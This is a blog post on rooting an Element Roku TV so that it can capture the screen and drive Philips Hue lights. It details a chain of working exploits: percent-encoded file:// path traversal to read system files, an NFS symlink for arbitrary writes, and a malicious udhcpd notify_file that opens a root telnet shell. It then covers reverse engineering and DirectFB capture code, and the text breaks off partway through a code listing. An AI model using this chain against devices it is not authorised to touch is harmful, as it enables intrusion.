Hacking a Roku TV to Control Lights

This is a rather large blog post consisting of multiple sections, from some quick background on the problem to an in-depth dive into the hacking process, the reverse engineering and the final custom application.

I’ve included a table of contents to make it easy to navigate or if you want to skip to any parts you’re particularly interested in.

Table of Contents

The Problem

I’ve got two things in my living room.

A set of Philips Hue lights that provide light around the room.

The Hue lights are really nice, allowing you to change up the color and brightness to really change the look of your environment. You can go from a bright white fluorescent light for studying to a dim yellow nightlight for midnight lounging.

Moreover, Philips semi-recently released a feature called Hue Entertainment that allows you to sync up your lights to music, videos etc. This looks absolutely fantastic and really makes watching movies and playing games a lot more immersive like this:

A 50-inch Element 4K TV powered by Roku.

This Element TV was one of the cheapest at the time and it has held up well over the years.

I don’t actually use any of the Roku/Smart TV functionality on it. Instead, the primary sources on it are a PlayStation, an Xbox and a Chromecast.

All of this brings us to the problem: the Hue ecosystem is blissfully unaware of anything on the TV. The Hues need some sort of software that can read the pixel values on the screen and set the lights to the right color. On the computer, this is achieved through the use of the Hue Sync App, a program that runs in the background capturing your screen and using it to decide the colors.

However, when it comes to content playing on the TV, there is really no easy way to pump the pixel data to your controller software. You could mirror your computer screen with an HDMI cable, but that doesn’t allow you to capture stuff like game consoles and requires you to play back all your media on your computer.

If you wanna pay an arm and a leg, Philips has a device called an HDMI Sync Box. It costs $230 at the time of writing, almost the price of the actual TV! The sync box works as a 4-way HDMI switcher: you plug all your devices like your Chromecast and consoles into it and then you can select which one to pass through. It listens in on the video signal and then uses it to match the lights. Simple enough but stupidly expensive.

On the other hand, homebrew solutions for this vary widely. One of the most promising ones has been using an HDMI splitter that takes the signal and sends it to two outputs. You plug one into the TV and plug the other into a capture card hooked up to a Raspberry Pi. The Pi then uses software written by the Harmonize Project to sync up the lights.

One solution that I used for a little while was to have a Raspberry Pi hooked up with a camera looking at the screen. You perform some perspective warping and then detect the colors on screen from that. This was pretty appealing since it requires no faffing about with HDMI cables or splitters. You can find an example of such code here as part of the PiHueEntertainment project. You can find my own hacky disgusting code to do the same thing here.

Roku TVs

Alright, now that we know a bit about the problem, let’s talk about Roku powered TVs.

Roku devices themselves are positively ancient: they came out in 2008 and predate the creation of Chromecasts, Fire TV sticks, Apple TV etc. They popularized the lightweight streaming device area, allowing people to watch Netflix, YouTube, Hulu and friends on their TVs in a super convenient way.

Starting in the mid 2010s, we started seeing the popularization of “smart TVs”. As opposed to “dumb TVs” that can only display what you plug into them, these smart TVs started integrating streaming features into the TV itself. This meant that TVs themselves started being able to connect to the internet and have enough hardware to stream and decode video.

Roku, realizing they had already built up a software stack and ecosystem in this area, partnered with TV manufacturers to provide Roku as the operating system for these Smart TVs. This partnership was generally done with low-end TV makers like TCL, Hisense and my own Element. These companies would generally not be able to write their own smart TV software, unlike the big players: Samsung, LG, Sony etc.

Now these Roku TVs have one particularly creepy and privacy intrusive “feature.” The TV will look at the content you’re watching from your HDMI/cable or other devices and advertise watching them from the beginning on their own smart services. This Verge article goes into it in a bit more detail. It shows up on the TV like this:

The presence of this advertising indicates that the TV is capable of monitoring what is being played through its inputs and encouraged me to start looking for a way to try to get my own code running on it.

Hacking the Roku

The Roku Developer Ecosystem

Within Roku’s operating system, each streaming service is delivered in the form of an app which Roku calls a “channel”. These apps/channels can be obtained from Roku’s marketplace and allow services like Netflix, ESPN, YouTube etc. to make their interfaces and streams available on Roku devices.

The selection of Roku channels is massive and ranges from the big name streaming services to little games: https://channelstore.roku.com/browse/apps

As such, Roku has an SDK so that you can develop your own little Roku app. The process for developing an app is quite open, allowing you to use your own device as a development environment as long as you know the right button combo to press. Much like Android, where you tap the Build Number button in the about page to enable developer options, on Roku you enter a Konami-code-like sequence.

Roku’s developer setup page goes over the details. At the time of writing you just had to press (Home, Home, Home, Up, Up, Right, Left, Right, Left, Right) to be brought to the developer settings. Once active, your TV starts up a web server that lets you upload apps packaged as zip files.

Coding Roku Apps

Great, so this allowed me to run my own apps on the Roku. Now what are these apps actually programmed in?

As it turns out, Roku has rolled their own programming language called BrightScript. And it is based on, of all things, Basic.

In their own words, BrightScript is an interpreted language running on a C-based interpreter.

BrightScript compiles code into bytecode that is run by an interpreter. This compilation step happens every time a script is loaded and run. There is no separate compile step that results in a binary file being saved. In this way it is similar to JavaScript.

BrightScript is a powerful bytecode-interpreted scripting language optimized for embedded devices. In this way it is unique. For example, BrightScript and the BrightScript component architecture are written in 100% C for speed, efficiency, and portability.

As anyone who has tried to sandbox a capable language will tell you, it is a fairly tough job. Correctly restricting things like filesystem access, ensuring you don’t accidentally expose library functions and the like without support from the operating system such as with cgroups is very tough. On an embedded system such isolation was unlikely so BrightScript was likely going to be a good place to start to find exploits.

BrightScript is fairly powerful: it has bindings for stuff like OpenSSL, UDP/TCP sockets and JSON parsing. After uploading the hello world app and having a glance at the developer documentation, I quickly realized there was actually an interactive REPL for BrightScript running on a telnet server on the TV.

We can hop onto the BrightScript REPL server with telnet on port 8085 and start exploring:

Brightscript Debugger> di = CreateObject("roDeviceInfo")

Brightscript Debugger> ? di.GetModel()

Brightscript Debugger> ? di.GetModelDetails()
<Component: roAssociativeArray> =
    ModelNumber: "7515X"
    ScreenSize: 50
    VendorName: "Element"
    VendorUSBName: "Longview_Changhong_Element_YN"

As it turns out, my TV model, the 7000X, is fairly powerful according to Roku’s specs.

                                 4K Roku TV
Code Name                        Longview
roDeviceInfo.GetModel()          7000X
CPU                              ARM dual core 1.2 GHz
Accelerated Graphics API         OpenGL ES 2.0
Max UI Resolution                1920x1080
Max Playback Resolution          3840x2160

A Vulnerable API Function

The next step was to explore the API surface. One really interesting part of it was the roUrlTransfer object, which essentially allows you to make HTTP requests. For example:

Brightscript Debugger> r = CreateObject("roUrlTransfer")
Brightscript Debugger> r.SetUrl("http://example.com")
Brightscript Debugger> ? r.GetToString()
<!doctype html>
    <title>Example Domain</title>

Where there’s http on embedded devices, curl or libcurl is usually close behind. The documentation on the ifUrlTransfer page also confirms this:

EnablePeerVerification(enable as Boolean) as Boolean

Verifies that the certificate has a chain of trust up to a valid root certificate using CURLOPT_SSL_VERIFYPEER.

One key thing to realize about curl is that even though it is primarily used for web requests, it supports a wide variety of other protocols (these can be disabled during compilation) such as:

  • ftp:// - File Transfer Protocol
  • gopher:// - The Gopher Protocol

but most importantly for us, it supports the file:// protocol that lets you grab files from the local file system. For example on your machine running

$ curl file:///etc/passwd

will grab the contents of /etc/passwd.

Could it really be this easy? Could we just grab files off the Roku like this? Sadly, no.

Brightscript Debugger> r.SetUrl("file:///etc/passwd")
*** ERROR: Missing or invalid PHY: '/etc/passwd'

Clearly there was some attempt to restrict the file:// protocol, but how good was this attempt? As it turns out, not really. Roku wanted you to be able to use file:// to access files that you could access through the normal file APIs they provide, so for example you can do:

Brightscript Debugger> r.SetUrl("file://pkg:/manifest")
Brightscript Debugger> ? r.GetToString()
##   Channel Details
title=Hello World

If we actually run the GetUrl() method after performing this, we can see what the BrightScript internals end up rewriting this into:

? r.GetUrl()

exposing some nice internal paths to us. But this also shows that they seem to be concatenating our url path in front of tmp/plugin/GPAAAAX4Lckh/ so could we just use the ../.. characters in the URL to traverse up the path?

Brightscript Debugger> r.SetUrl("file://pkg:/../../../../etc/passwd")
Brightscript Debugger> ? r.GetUrl()

Not quite, looks like there’s some magic going on that strips the dot-dots out of the URL. However, there seems to be one simple trick that the Roku developers forgot about. URLs support url/percent encoding, so instead of putting in the raw .. we can replace it with the equivalent percent-encoded characters, %2E%2E. This gives us the url:


Checking r.GetUrl() again, this time we see:

Brightscript Debugger> ? r.GetUrl()

Cool, the traversal characters didn’t get stripped out, so I crossed my fingers and fired off:

Brightscript Debugger> ? r.GetToString()
default:x:500:500:Default non-root user:/home/default:/bin/sh
app:x:501:501:roku app:/home/default:/bin/sh

There we go, an arbitrary read primitive.
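As a rough illustration of the encoding trick, here is a minimal C sketch that percent-encodes every dot in a path so that a filter looking for a literal .. no longer sees one. The function name encode_dots is made up for this example, and this is not code that ran on the TV; the actual URL was typed by hand into the REPL.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copies `in` to `out`, replacing every '.' with its percent-encoded form
 * "%2E". Returns the number of characters written (not counting the
 * terminating NUL), or 0 if `out` is too small to hold the result. */
size_t encode_dots(const char *in, char *out, size_t out_size) {
    assert(in != NULL && out != NULL);
    if (out_size == 0) {
        return 0;
    }
    size_t n = 0;
    for (; *in != '\0'; in++) {
        size_t need = (*in == '.') ? 3 : 1;
        if (n + need + 1 > out_size) {   /* +1 keeps room for the NUL */
            out[0] = '\0';
            return 0;
        }
        if (*in == '.') {
            memcpy(out + n, "%2E", 3);
        } else {
            out[n] = *in;
        }
        n += need;
    }
    out[n] = '\0';
    return n;
}
```

Feeding it ../../etc/passwd yields %2E%2E/%2E%2E/etc/passwd, which a URL decoder turns back into the original traversal path after the naive filter has already run.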

Leveraging the File Read Exploit

So at this point we have the ability to read files from the system, but what does this really give us? Well, Linux is awesome and exposes a lot of critical information through procfs, usually mounted under /proc/ on the system.

For example, the file /proc/self/environ will tell you the environment variables the file-reading process was launched with:

$ TEST=123 cat /proc/self/environ
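One detail worth knowing when reading this file back: the entries in /proc/<pid>/environ are separated by NUL bytes rather than newlines. A small C sketch of looking up one variable in such a buffer follows; environ_lookup is a hypothetical helper written for this post, not something from the Roku firmware.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Looks up `name` in a buffer of NUL-separated "NAME=value" entries, the
 * layout used by /proc/<pid>/environ. Returns a pointer to the value inside
 * `buf`, or NULL if the variable is absent. An unterminated trailing entry
 * is ignored so the returned string is always NUL-terminated. */
const char *environ_lookup(const char *buf, size_t len, const char *name) {
    assert(buf != NULL && name != NULL);
    size_t name_len = strlen(name);
    size_t pos = 0;
    while (pos < len) {
        const char *entry = buf + pos;
        const char *end = memchr(entry, '\0', len - pos);
        if (end == NULL) {
            break;                       /* last entry has no terminator */
        }
        size_t entry_len = (size_t)(end - entry);
        if (entry_len > name_len && entry[name_len] == '=' &&
            strncmp(entry, name, name_len) == 0) {
            return entry + name_len + 1;
        }
        pos += entry_len + 1;            /* skip the entry and its NUL */
    }
    return NULL;
}
```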

Among other things, procfs also exposes the memory map of a process, e.g what memory addresses parts of the executable, shared libraries, the stack and heap are present at. This is usually found at /proc/self/maps.

procfs can also tell you what filesystems are mounted on the system through /proc/mounts.

Both of these were absolutely valuable in performing reconnaissance and understanding how Roku had set up their Linux distribution. For example through /proc/version we can learn what kernel the Roku is using:

Linux version 3.10.108-grsec-rt122 ([email protected])
(gcc version 5.4.0 (crosstool-NG crosstool-ng-1.22.0 - Roku GCC toolchain 20191226))
#1 SMP PREEMPT Thu Jul 16 21:50:19 UTC 2020

Through /proc/self/maps we learn that the main Roku application that runs on the TV lives under /bin/Application and it utilizes a ton of shared libraries:

00010000-00c82000 r-xp 00000000 fd:fa 2272       /bin/Application
00c92000-00c9a000 r--p 00c72000 fd:fa 2272       /bin/Application
00c9a000-00cb0000 rw-p 00c7a000 fd:fa 2272       /bin/Application
6b104000-6b21a000 r-xp 00000000 fd:fa 2606       /lib/libPlayReady.so
ac975000-ac9c6000 r-xp 00000000 fd:fa 2574       /lib/libBrightScript.so
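To pick the interesting files out of a maps dump automatically, each line can be split into its fields. The following is a minimal sketch, assuming the usual "start-end perms offset dev inode path" layout shown above; MapEntry, parse_maps_line and map_is_executable are names invented for this example, and paths containing spaces would be cut short by the %s conversion.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    unsigned long start;   /* first address of the mapping */
    unsigned long end;     /* one past the last address */
    unsigned long offset;  /* offset into the backing file */
    char perms[5];         /* e.g. "r-xp" */
    char path[256];        /* empty for anonymous mappings */
} MapEntry;

/* Parses one line of /proc/<pid>/maps. Returns 1 on success, 0 otherwise. */
int parse_maps_line(const char *line, MapEntry *entry) {
    assert(line != NULL && entry != NULL);
    entry->path[0] = '\0';
    /* The device ("fd:fa") and inode fields are skipped with %*s and %*u. */
    int fields = sscanf(line, "%lx-%lx %4s %lx %*s %*u %255s",
                        &entry->start, &entry->end, entry->perms,
                        &entry->offset, entry->path);
    return fields >= 4;    /* the path is optional */
}

/* True if the mapping is executable, i.e. likely a code segment. */
int map_is_executable(const MapEntry *entry) {
    assert(entry != NULL);
    return strchr(entry->perms, 'x') != NULL;
}
```

Collecting the distinct path values of the executable mappings gives the list of binaries and libraries worth downloading.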

Through this information we can acquire the application binary as well as the key libraries and pop them open in Ghidra to understand how they work. As it turns out, the Roku software stack is a giant C++ application. As someone who is primarily used to reverse-engineering C, this presented a bit of a learning curve, but once you figure out the usual suspects like std::string and std::vector, it becomes a lot easier. It also helped that the system uses lots of shared libraries, so there are a lot of exported symbol names present.

Grabbing binary files was a little more complex than simple text files. BrightScript strings are null terminated, so the r.GetToString() function would only return results up to the first null byte, making it useless for ELFs and other binaries. We ended up finding a workaround: saving the data to a file with r.GetToFile("tmp:/file_to_save") and then either streaming it over the network in chunks that could be held in memory or saving it to a USB drive using r.GetToFile("ext1:/file").

At this point, I realized that my method of downloading one file at a time was fairly limited and only gave me a fairly narrow view on what was on the system. So we took a look at /proc/cmdline:

LX_MEM=0x21c00000,0x08a00000 LX_MEM2=0xac800000,0x13800000 EMAC_MEM=0x20400000,0x00100000 rtlog_mem_pa=0x20200000 rtlog_mem_size=0x00200000 vmalloc=512m console=ttyS0,0 ethaddr=00:e4:00:0e:f2:69 roku.bdrev=6 ip=off root=/dev/mtdblock_robbs1 ro rootfstype=cramfs init=/init roku.wakeupreason= backlight=0 rokuled=50,1,1536 mtdparts=edb64M-nand:7168k(Boot),[email protected](Active),[email protected](Update),[email protected](RW)enc,[email protected](ID),[email protected](PC),[email protected](UBAPP),[email protected](LLAT),[email protected](SPARE) roku.blgpio=164:H chip_id=0xa02e8b0c model_has_hdr10=1 totalmem=1024 roothash=3b1d203af1706cdaf86af4a5b8530ed9c15d42478039b174f50bb1d095dfc1fe BOOTTIME_SBOOT=2636 BOOTTIME_UBOOT=914

and noticed

root=/dev/mtdblock_robbs1 ro rootfstype=cramfs init=/init

specifically. We realized that rootfs is loaded from /dev/mtdblock_robbs1 and is cramfs based. So at this point we decided to download the entire /dev/mtdblock_robbs1 device and take a look at it. Running binwalk on it we find:

$ binwalk mtdblock_robbs1.cramfs

0             0x0             Roku aimage SB
512           0x200           Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 63975146 bytes, 3615 inodes, blocksize: 131072 bytes, created: 2020-12-04 05:06:22
63979520      0x3D04000       Roku aimage SB
64245760      0x3D45000       Roku aimage SB
64293472      0x3D50A60       AES S-Box
64296384      0x3D515C0       AES Inverse S-Box
64491980      0x3D811CC       Roku aimage SB
64512364      0x3D8616C       SHA256 hash constants, little endian
65266848      0x3E3E4A0       CRC32 polynomial table, little endian
65267872      0x3E3E8A0       CRC32 polynomial table, little endian
65433083      0x3E66DFB       mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 8bit
66324957      0x3F409DD       Cisco IOS experimental microcode, for "O"
69996544      0x42C1000       Roku aimage SB
69996800      0x42C1100       uImage header, header size: 64 bytes, header CRC: 0x2B984F0E, created: 2020-12-04 05:06:45, image size: 3409876 bytes, Data Address: 0x21C08000, Entry Point: 0x21C08000, data CRC: 0x64F1A541, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: gzip, image name: "Linux 3.10.40"
69996864      0x42C1140       gzip compressed data, maximum compression, has original file name: "vmlinux.bin", from Unix, last modified: 2020-12-04 05:06:44
73420800      0x4605000       Roku aimage SB

Awesome, it’s an intact squashfs filesystem with a bunch of extra stuff tacked on at the end. Having binwalk extract the squashfs, we find:

$ ls disk_image
bin     config  dev  home  lib      media  nvram  opt      proc    root  sdcard0  sys  usr  www
common  custom  etc  init  linuxrc  mnt    omv    plugins  RokuOS  sbin  sdcard1  tmp  var

This made it significantly easier to understand the overall structure of the system and find exploits in more than just the main application binary.
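For the curious, the way a tool like binwalk spots the filesystem is by scanning for known signatures. A little-endian squashfs image starts with the four bytes "hsqs", which is what sits at offset 512 in the dump above. The sketch below shows only that signature scan; find_squashfs is a hypothetical helper, and binwalk itself does a great deal more validation than this.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Returns the offset of the first little-endian squashfs magic ("hsqs")
 * in `buf`, or -1 if the buffer does not contain one. */
long find_squashfs(const unsigned char *buf, size_t len) {
    static const unsigned char magic[4] = { 'h', 's', 'q', 's' };
    assert(buf != NULL);
    for (size_t i = 0; i + sizeof magic <= len; i++) {
        if (memcmp(buf + i, magic, sizeof magic) == 0) {
            return (long)i;
        }
    }
    return -1;
}
```

With the offset in hand, everything from that point up to the size reported in the squashfs superblock can be carved out and handed to unsquashfs.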

Getting More Access

While we could read files and understand the behavior of the system pretty thoroughly, we were still pretty far from code execution. At this point I met a couple of really smart hackers on the Exploiteers discord, devnull and popeax, who helped a lot by sharing information and tricks they had discovered.

We were able to discover an undocumented feature in /bin/Application that Roku had implemented to make the development process a lot easier. Instead of constantly re-uploading a .zip file to test your channel, they allowed running a channel from a Network File System (NFS) mount. NFS basically allows you to mount directories from other servers over a network connection. You could utilize this feature by adding the key pkg_nfs_mount like so:


to your channel manifest. Upon seeing this in the manifest, the channel loader will try to mount the NFS server and directory you specified and then read the source files from there.

The key thing to realize about an NFS mount is that it supports all the features of a Linux filesystem, including the ability to have symlinks. So for example if on your NFS server you have a symlink set up pointing to / like so:

[email protected]:/media/nfs$ ls -la .
drwxr-xr-x 5 root  root  4096 Apr 23 12:13 .
drwxr-xr-x 3 root  root  4096 Mar 24 06:53 ..
-rw-r--r-- 1 root  root   876 Apr 23 12:13 manifest
lrwxrwxrwx 1 root  root     1 Mar 24 06:56 root -> /

then anyone who mounts the directory will also see:

[email protected]:~$ ls -la /tmp/test-mount/root
lrwxrwxrwx 1 root root 1 Mar 24 06:56 /tmp/test-mount/root -> /

Importantly, this symlink is resolved on the end of whoever mounted it, so accessing the file /tmp/test-mount/root/etc/passwd will actually lead to the /etc/passwd file on the nfs-client system.

Now the implications of this in terms of BrightScript access are absolutely huge. While we could only read files with the curl-based exploit, this actually lets us write to arbitrary locations in the filesystem too. Ordinarily the BrightScript filesystem restricts you to locations such as pkg:/, tmp:/, ext1:/ etc. and has robust protection against traversal, but a symlink such as the one from the method above is not detected.

This means that we can now use BrightScript methods such as WriteAsciiFile to write to anywhere on the filesystem. For example:

WriteAsciiFile("pkg:/root/tmp/test", "hello world")

and this actually shows up on the Roku under /tmp/test.

Great, so through some reverse engineering and a little help from our friends we’ve turned our arbitrary read into an arbitrary read-write.

Code Execution from Writing Files

Despite being able to write to anywhere, we are still fairly limited. The actual filesystem is mounted as read-only for almost all directories. This means that getting code execution won’t be as simple as replacing /bin/Application or anything like that.

In particular, the only directories that were writable were /tmp and /nvram. /tmp is as it would be on a conventional Linux system, a temporary file system. /nvram is a non-volatile storage location that stores data such as the channels installed by the user, channel specific login information and system settings and preferences.

Would it be possible to get code execution from writing into one of these directories? At first glance it seemed fairly difficult: while a lot of init scripts will execute stuff stored in /nvram, for example S56sound:

# Dev mode local override
read roku_dev_mode rest < /proc/cmdline
if [ "$roku_dev_mode" = 'dev=1' ] && [ -f /nvram/S86sound ]
    echo "=== ALSA INIT from /nvram/S86sound"
    source /nvram/S86sound
    modprobe mhal-alsa-audio || echo "WARNING:  ALSA driver not found or failed to load"

these are guarded by "$roku_dev_mode" = 'dev=1' checks, where dev=1 is a parameter set in /proc/cmdline (the Linux startup parameters) on Roku development machines.
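Note that the shell line read roku_dev_mode rest < /proc/cmdline only puts the first word of the command line into roku_dev_mode, so the guard passes only when dev=1 is the very first parameter. Here is the same check sketched in C; first_word_is is a name made up for this illustration.

```c
#include <assert.h>
#include <string.h>

/* Mimics `read first rest < /proc/cmdline` followed by a string compare:
 * returns 1 if the first whitespace-delimited word of `cmdline` is exactly
 * `expected`, and 0 otherwise. */
int first_word_is(const char *cmdline, const char *expected) {
    assert(cmdline != NULL && expected != NULL);
    cmdline += strspn(cmdline, " \t\n");           /* skip leading blanks */
    size_t word_len = strcspn(cmdline, " \t\n");   /* length of first word */
    return word_len == strlen(expected) &&
           strncmp(cmdline, expected, word_len) == 0;
}
```

On my TV the command line starts with LX_MEM=..., so this check fails and the /nvram override is never sourced.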

Eventually after searching all across the application and system scripts in the disk image we stumbled upon the following code as part of the S64wifi init script:

[ -f /nvram/udhcpd-p2p.conf ] && UDHCPD_CONF=/nvram/udhcpd-p2p.conf
cp $UDHCPD_CONF /tmp/udhcpd-p2p.conf
echo "interface $P2PINTF" >> /tmp/udhcpd-p2p.conf
udhcpd /tmp/udhcpd-p2p.conf

Let’s take a minute to examine what this is doing.

  1. Set UDHCPD_CONF to default to /lib/wlan/realtek/udhcpd-p2p.conf.
  2. If /nvram/udhcpd-p2p.conf exists, override UDHCPD_CONF with that file.
  3. Copy the UDHCPD_CONF file to /tmp/udhcpd-p2p.conf.
  4. Start up udhcpd (a lightweight DHCP server that is part of busybox) using the configuration file in /tmp/udhcpd-p2p.conf.

This means that we fully control all configuration parameters to udhcpd if we set up our own /nvram/udhcpd-p2p.conf file, which the arbitrary file write exploit allows us to do.

Despite busybox’s reputation of being lightweight, you can expect that any daemon will have a fun set of options and udhcpd is no exception. It provides this absolutely fantastic option called notify_file which is described as:

Everytime udhcpd writes a leases file, the below script will be called.

Useful for writing the lease file to flash every few hours.

#notify_file #default: (no script)

And there we have it, as soon as udhcpd hands out a lease, it will invoke the notify_file we specified. As a cherry on top, udhcpd runs as root as part of the startup process, so whatever script we provide it will run as root.

For those curious, the Roku has a dhcp server because it supports connecting certain remotes and devices over a Wi-Fi Direct network.

While I initially ended up connecting my phone to trigger a lease to be handed out, we also realized that setting auto_time to a very tiny interval will also cause notify_file to be invoked. This allows the root access to persist across restarts without any human intervention.
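To make the two options concrete, here is a small C sketch that renders just those lines of a udhcpd configuration. The function build_udhcpd_conf and the script path used in the usage note are hypothetical, and a working file would still need the other settings carried over from the default udhcpd-p2p.conf, which are not reproduced here.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Writes the notify_file and auto_time lines of a udhcpd config into `out`.
 * Returns the number of characters written, or -1 if the buffer is too
 * small or the script path contains whitespace (config values are
 * whitespace-delimited, so such a path would be split). */
int build_udhcpd_conf(char *out, size_t out_size,
                      const char *script_path, unsigned auto_time_secs) {
    assert(out != NULL && script_path != NULL);
    if (strpbrk(script_path, " \t\n") != NULL) {
        return -1;
    }
    int n = snprintf(out, out_size,
                     "notify_file %s\n"   /* run each time leases are written */
                     "auto_time %u\n",    /* seconds between lease file writes */
                     script_path, auto_time_secs);
    return (n >= 0 && (size_t)n < out_size) ? n : -1;
}
```

Calling build_udhcpd_conf(buf, sizeof buf, "/nvram/root.sh", 1) produces a fragment asking udhcpd to rewrite its lease file every second and to run the script each time.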

With this in hand, we set up a script file containing

busybox telnetd -l /sbin/loginsh -p 1337

pointed notify_file towards it, and as soon as a lease was handed out we had a root telnet server on port 1337:

$ telnet 1337
Connected to
Escape character is '^]'.

WIFI DRIVER PATH: /lib/wlan/realtek
longview:/ # whoami

(You can read more about how this process was made slicker by popeax here)

From Code Execution to Ambient Lighting

Reverse Engineering the TV’s Recognition

Alright, so that was a whole adventure to get code execution going. Now we can finally get to the problem that kicked this all off: getting the TV to control the lights based on the content it is showing.

So back to the creepy feature I talked about in the introduction. In Roku and industry speak it is known as “Automatic Content Recognition” (ACR), and Roku themselves describe it as:

The Roku TV is also equipped with Automatic Content Recognition (ACR) technology that, when enabled, allows Roku to recognize the programs and commercials being viewed through the Roku TV’s antenna, and devices connected to your Roku TV, including cable and satellite set top boxes.

so searching for symbols related to “ACR” in the reverse engineered codebase was a good place to start.

One of the symbols we find is gnsdk_acr_query_write_video_frame. For those wondering, it looks like Roku uses Gracenote’s ACR library, hence the gnsdk.

If we look at the caller of the function, it comes with the following logging calls:

  s_acr.gn._00ca3837, "thrd.exit.early.nullptr",
  "Could not create VideoCapture device"

  s_acr.gn._00ca3837, "cap.toosmall",
  "captured frame too small, width %d", iVar3);

  s_acr.gn._00ca3837, "thrd.pause",
  "Capture loop is paused");

This is definitely all stuff related to capturing the output of the screen, putting us on the right track.

In particular the "Could not create VideoCapture device" logging call is very interesting, it is present under the following context:

av_instance = Roku::PlatformAV::GetInstance();
videoCaptureDevice = (av_instance->vtable + 0x24)(av_instance);

if ((int)videoCaptureDevice == 0) {
    s_acr.gn._00ca3837, "thrd.exit.early.nullptr",
    "Could not create VideoCapture device");

meaning the code we are after is going to be under the PlatformAV class, and specifically as part of one of the methods it implements. Following this chain of code down to the VideoCapture class and doing some reverse engineering we find that it does the following:

IDirectFB *dfb = ...;

const char* capture_descriptor_format = ""

char descriptor[500];
int descriptor_length = snprintf(
  descriptor, 500, capture_descriptor_format,
  0, 0, capture_width, capture_height, "FALSE", "FALSE");

DFBDataBufferDescription data_buffer_descr;
data_buffer_descr.flags = 2;
data_buffer_descr.file = (char *)0x0;
data_buffer_descr.data = descriptor;
  "GOPC Buffer: %s", descriptor);

IDirectFBDataBuffer *buffer;

if (dfb->CreateDataBuffer(dfb, &data_buffer_descr, &buffer) != 0) {
  Roku::Log::Logger::logConsole(s_mstarvidcap._001d1190, "fail",
    "CreateDataBuffer failed");

IDirectFBImageProvider *imageProvider;
int return_code = buffer->CreateImageProvider(buffer, &imageProvider);
if (return_code != 0) {
  Roku::Log::Logger::logConsole(s_mstarvidcap._001d1190, "fail",
    "DFB CreateImageProvider failed (%p) %d", imageProvider, return_code);

This was an absolute pain to reverse, but once done led exactly to the critical library in the capturing process. These CreateDataBuffer and CreateImageProvider functions are provided by a library called DirectFB (Direct Frame Buffer) which is what Roku uses to draw to the TV.

Thanks to DirectFB being licensed under the LGPL, Roku releases their modifications as part of their OpenSourceSoftware dropbox. So I grabbed Roku Open Source Software > 9.4.0 > OSS-RokuHDRTV > sources > directfb-1.4.2 and started taking a look.

Writing our own Screen Capture Code

The directfb source code provided by Roku was an absolute treasure trove of information. As it turns out the Roku TV uses a chip by MStar Semiconductors that is responsible for dealing with all the HDMI functionality of the TV. This includes decoding the HDCP DRM system, switching inputs etc.

As part of the directfb source provided by Roku are examples provided by MStar, which demonstrate exactly how to use the MStar’s capturing API. In particular, the "GOPC" stuff we saw in the Roku code above corresponds to a DirectFB image provider that utilizes the MStar GOP API to capture the image on screen. I’m not sure what GOP stands for here, if anyone does please let me know.

This capture device uses pretty low-level MStar APIs internally, e.g. MApi_GOP_DWIN_Init() and MApi_GOP_SetClkForCapture(), to provide a high-level API to capture the screen. From what I can tell, the MStar chip performs a Direct Memory Access (DMA) into the memory of the Roku to place the image into it. Either way, the low-level details aren’t too important. What we can take away from this is that we should be able to write our own DirectFB code and capture the screen.

Thus I set up a development environment on my Raspberry Pi so I could compile for ARM and hacked away. Luckily the Makefile in the directfb sources that Roku provide told me exactly how to compile my program:

FUSION_LIB= -ldirect -lfusion
MSTAR_LIB= -lrt -lpthread -ldrvMVOP -lapiGFX -lapiGOP -llinux  -ldrvVE -lapiXC -lapiPNL -ldrvWDT -ldrvSAR -lapiSWI2C -ldrvGPIO -ldrvCPU -ldrvCMDQ -lapiVDEC -ldrvAUDSP -lapiAUDIO -ldrvIPAUTH -lapiJPEG -lapiDMX -lapiDLC -lapiACE

pixels_on_tv: pixels_on_tv.c
	gcc -O3 \
		-Idirectfb/src -Idirectfb/include -Idirectfb/lib \
		pixels_on_tv.c \
		-L./lib/ $(FUSION_LIB) $(MSTAR_LIB) \
		-Wl,--dynamic-linker=/lib/ld-linux.so.3 -o pixels_on_tv

I shoved in the libraries from the disk image I retrieved earlier and started off the process with a very simple hello-directfb program:

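#include <stdio.h>
#include <directfb.h>

int main(int argc, char** argv) {
    printf("Hello, world!\n");

    IDirectFB *dfb;

    // DirectFBInit takes argc/argv style arguments, so fake a minimal set.
    int fb_argc = 1;
    char* arg = "Application";
    char** fb_argv = &arg;

    DirectFBInit(&fb_argc, &fb_argv);

    // ... the capture code goes here ...

    return 0;
}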

After this I loosely followed the reverse-engineered code from the Roku VideoCapture class and created a GOPC image provider with


and used

    imageProvider->RenderTo(imageProvider, surface, NULL);
    surface->Dump(surface, "./dump/", "test");

With that I was blissfully met with a test-00000.bmp that contained:

A perfect little 4K screenshot of the episode of “Halt and Catch Fire” being played on the TV 🙏

Getting the Lights to React to the Captured Video

With the image in hand, the final piece of the puzzle is getting the lights to actually change with the content on the screen. This part is relatively easy though hard to do in a performant way. My initial prototype captured the entire screen and beamed it over to my laptop so I could display it full screen there and just use the regular Hue Sync application to test out.

This certainly worked but it was truly slow: sending a raw 4K image across a local network from the device ran at around 1-2 frames per second, which was far too slow. While I could have tried using a JPG encoder to make a much smaller image, I figured that encoding on the device would be a bit too slow too.
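Some back-of-the-envelope arithmetic shows why raw frames hurt. The sketch below assumes 2 bytes per pixel, which matches a packed 4:2:2 YCbCr layout but is only an assumption about what was actually sent over the wire; both helper names are invented for this example.

```c
#include <assert.h>
#include <stddef.h>

/* Size in bytes of one uncompressed frame. */
size_t frame_bytes(size_t width, size_t height, size_t bytes_per_pixel) {
    assert(bytes_per_pixel > 0);
    return width * height * bytes_per_pixel;
}

/* Network throughput, in megabits per second, needed to ship frames of
 * the given size at `fps` frames per second. */
double required_mbit_per_sec(size_t bytes_per_frame, double fps) {
    return (double)bytes_per_frame * 8.0 * fps / 1e6;
}
```

A 3840x2160 frame at 2 bytes per pixel is 16,588,800 bytes, so even 2 frames per second needs roughly 265 Mbit/s before any capture or copying overhead. Four averaged corner colors at 3 bytes each are just 12 bytes per frame.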

The solution I ended up with for now was to capture the corners of the screen for a faster capture time, average the pixel values on the device for the corners and then send those over. This roughly ended up looking like this:

// Averages the EDGE_WIDTH x EDGE_WIDTH block of packed YCbCr pixels whose
// top-left corner is at (x, y).
